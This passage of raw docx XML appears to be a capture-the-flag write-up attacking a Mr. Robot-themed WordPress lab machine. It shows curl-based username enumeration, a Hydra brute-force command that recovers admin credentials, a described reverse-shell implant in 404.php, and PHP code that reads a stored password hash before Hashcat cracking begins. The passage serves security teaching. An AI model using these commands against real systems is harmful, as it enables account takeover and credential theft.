        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>?author=1 redirect enumeration — returned 200 OK with no Location header (author archives disabled)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>WPScan automated user enumeration (--enumerate u) — returned 'No Users Found' after brute-forcing author IDs 1-10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 4 — WPScan confirming WordPress 4.3.1, XML-RPC enabled, and No Users Found via author ID enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>After the automated checks produced no result, the login form was tested manually with two candidate names. The application returned different messages for an existing username and a nonexistent one:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>curl -s -X POST http://10.130.138.103/wp-login.php \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d "log=elliot&amp;pwd=wrongpass123&amp;wp-submit=Log+In" | grep -i "error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t># Result: "The password you entered for the username elliot is incorrect"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>curl -s -X POST http://10.130.138.103/wp-login.php \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d "log=qwertyuiopxyz&amp;pwd=wrongpass123&amp;wp-submit=Log+In" | grep -i "error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t># Result: "Invalid username"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The differing error messages indicated that elliot was a valid username on this installation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Password Recovery Through Wordlist Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The fsocity.dic file contained 858,160 lines. A test against the unprocessed list was estimated to take more than nine hours, so duplicate entries were removed first. This reduced the working list to 11,451 distinct candidates:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>curl http://10.130.138.103/fsocity.dic -o fsocity.dic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">sort fsocity.dic | uniq &gt; fsocity_clean.dic   # 858,160 → 11,451 unique entries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hydra -l elliot -P fsocity_clean.dic 10.130.138.103 \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log+In:The password you entered" -t 30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The reduced list produced working WordPress credentials in about five minutes:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="936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9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="93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143552"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WordPress Credentials: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>elliot : ER28-0652</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 5 — Hydra recovering elliot:ER28-0652 from the deduplicated wordlist in ~5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.5 Verifying Administrative Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The recovered login details opened the WordPress administration area. The dashboard greeting, “Howdy, Elliot Alderson,” confirmed the authenticated account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 6 — WordPress admin dashboard accessed as Elliot Alderson</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.6 Reverse-Shell Attempt Through the Theme Editor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Because the account had administrator privileges, the theme editor was available under Appearance → Editor. The Twenty Fifteen theme's 404.php template was changed to test PHP command execution when a missing page was requested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 7 — 404.php modified with reverse shell payload; 'File edited successfully' confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Several reverse-shell variants were attempted, including PHP socket/exec, Bash /dev/tcp, and proc_open approaches. The editor accepted the changes without a PHP syntax error, but the netcat listener received no connection on either port 4444 or 443.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 8 — Triggering the injected 404.php; Firefox returns a connection error, not a WordPress-styled 404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>A standalone fsockopen() connectivity check, without launching a shell, returned “FAILED: 110 Connection timed out.” This supported the conclusion that outbound TCP traffic from the target to the VPN address was filtered by the lab network, rather than the failure being caused solely by payload syntax.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.7 Alternative Approach — Reading Local Files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>With the reverse-shell route unavailable, the same PHP execution point was used for local file inspection. PHP file functions could read accessible paths without needing a new outbound connection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Enumerate home directories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>print_r(scandir('/home'));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// → robot, ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// List robot's home directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>print_r(scandir('/home/robot'));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// → key-2-of-3.txt, password.raw-md5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 9 — PHP-based directory enumeration via 404.php revealing key-2-of-3.txt and password.raw-md5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The web-server account could not read key-2-of-3.txt because the file belonged to robot and its permissions did not allow access. The password.raw-md5 file, however, was readable and exposed the stored hash:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>file_get_contents('/home/robot/password.raw-md5');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// → robot:c3fcd3d76192e4007dfb496cca67e13b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.8 Recovering the Password from Its Hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Hashcat was used to compare the recovered MD5 value against entries in the rockyou.txt password list:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>echo "c3fcd3d76192e4007dfb496cca67e13b" &gt; robot_hash.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
